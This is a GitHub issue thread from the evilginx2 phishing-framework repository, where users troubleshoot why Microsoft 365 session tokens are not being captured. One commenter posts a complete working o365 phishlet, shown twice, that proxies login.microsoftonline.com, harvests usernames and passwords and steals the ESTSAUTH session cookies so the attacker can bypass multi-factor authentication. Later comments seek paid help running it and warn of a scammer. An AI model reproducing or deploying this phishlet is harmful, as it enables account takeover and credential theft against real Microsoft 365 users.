search

kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
BSD 3-Clause "New" or "Revised" License
10.72k stars 1.94k forks source link

Doesn't capture the token (O365) #691

Closed afiqizzuddinz closed 1 year ago

afiqizzuddinz commented 2 years ago

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Hello, want to ask, o365 doesnt capture token, do i need to configure the phishlets or is there something else because my account has mfa enabled

oposm commented 2 years ago

Hi,

The SignInStateCookie needs its domain changed to '.login.microsoftonline.com' for token capturing to start working again.

auth_tokens:
  - domain: '.login.microsoftonline.com'
   keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
#  - domain: 'login.microsoftonline.com'
#    keys: ['SignInStateCookie']
maggy-1 commented 2 years ago

The problem I am having right now is that I can not locate the session cookies. I do not know where to copy from. Any1 that can help me? I was able to capture the username and password. In the token section it says “None”

oposm commented 2 years ago

Replace the o365.yaml phishlet with the following and token capturing should start working again.

name: 'o365'
author: '@jamescullum'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
  # The lines below are needed if your target organization utilizes ADFS.
  # If they do, you need to uncomment all following lines that contain <...>
  # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
  # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
  #    <insert-adfs-subdomain> = adfs
  #    <insert-adfs-host> = example.com
  #    <insert-adfs-subdomain-and-host> = adfs.example.com
  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  # Uncomment and fill in if your target organization utilizes ADFS
  #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password)'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'
maggy-1 commented 2 years ago

Thank you for your reply. But this is beyond my comprehension. I swear I do not know how I can replace the o356.yaml phishlet. Is there any one you can recommend to me that can assist me further please.

On Mon, 29 Nov 2021 at 6:20 PM, oposm @.***> wrote:

Replace the o365.yaml https://github.com/kgretzky/evilginx2/blob/master/phishlets/o365.yaml phishlet with the following and token capturing should start working again.

name: 'o365' author: @.***' min_ver: '2.3.0' proxy_hosts:

  • {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  • {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}

    The lines below are needed if your target organization utilizes ADFS.

    If they do, you need to uncomment all following lines that contain <...>

    To get the correct ADFS subdomain, test the web login manually and check where you are redirected.

    Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:

    = adfs

    = example.com

    = adfs.example.com

    - {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false}

    - {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false}

    sub_filters:

  • {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  • {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}

    Uncomment and fill in if your target organization utilizes ADFS

    - {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}

    auth_tokens:

  • domain: '.login.microsoftonline.com' keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie'] credentials: username: key: '(login|UserName)' search: '(.)' type: 'post' password: key: '(passwd|Password)' search: '(.)' type: 'post' login: domain: 'login.microsoftonline.com' path: '/'

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/kgretzky/evilginx2/issues/691#issuecomment-981846522, or unsubscribe https://github.com/notifications/unsubscribe-auth/AWWSB4XEIIVXR6GXRET7C6DUOOY7BANCNFSM5I6DIEVQ . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.

MelroyB commented 2 years ago

see:

677

maggy-1 commented 2 years ago

Thank you so much for your quick response. Please is there anyone that I can add on telegram or any platform that can teach me or show me how to do this? I am willing to learn, please.

On Tue, Nov 30, 2021 at 6:45 PM Melroy @.***> wrote:

see:

677 https://github.com/kgretzky/evilginx2/issues/677

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/kgretzky/evilginx2/issues/691#issuecomment-982513650, or unsubscribe https://github.com/notifications/unsubscribe-auth/AWWSB4XOOLWRRV6GZC5KRRLUOSTLBANCNFSM5I6DIEVQ . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.

MelroyB commented 2 years ago

but are you willing to search for basic commands?

https://www.howtogeek.com/howto/42980/the-beginners-guide-to-nano-the-linux-command-line-text-editor/

maggy-1 commented 2 years ago

No, I am not. I am looking for someone who can connect via SSH and help me fix it even if it's for a fee. reason I want to connect with the person via telegram or any platform. Please help me.

On Tue, Nov 30, 2021 at 6:53 PM Melroy @.***> wrote:

but are you willing to search for basic commands?

https://www.howtogeek.com/howto/42980/the-beginners-guide-to-nano-the-linux-command-line-text-editor/

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/kgretzky/evilginx2/issues/691#issuecomment-982520047, or unsubscribe https://github.com/notifications/unsubscribe-auth/AWWSB4VJD2AGDXKDVSM7H7DUOSUKXANCNFSM5I6DIEVQ . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.

maggy-1 commented 2 years ago

Hello, I have been able to replace the o365.yaml phishlet with the following below yet the 0365 token isn't captured. What can I do please.

name: 'o365' author: '@jamescullum' min_ver: '2.3.0' proxy_hosts:

asapx6 commented 2 years ago

All issues can be fixed.... It's cuased due to update on the target end..... You can reach how to the developer on icq @mrgretzky

Kevin3-00 commented 2 years ago

All issues can be fixed.... It's cuased due to update on the target end..... You can reach how to the developer on icq @mrgretzky

You are a scammer using kgretzky i.d to scamm people for phishlets guys beware of him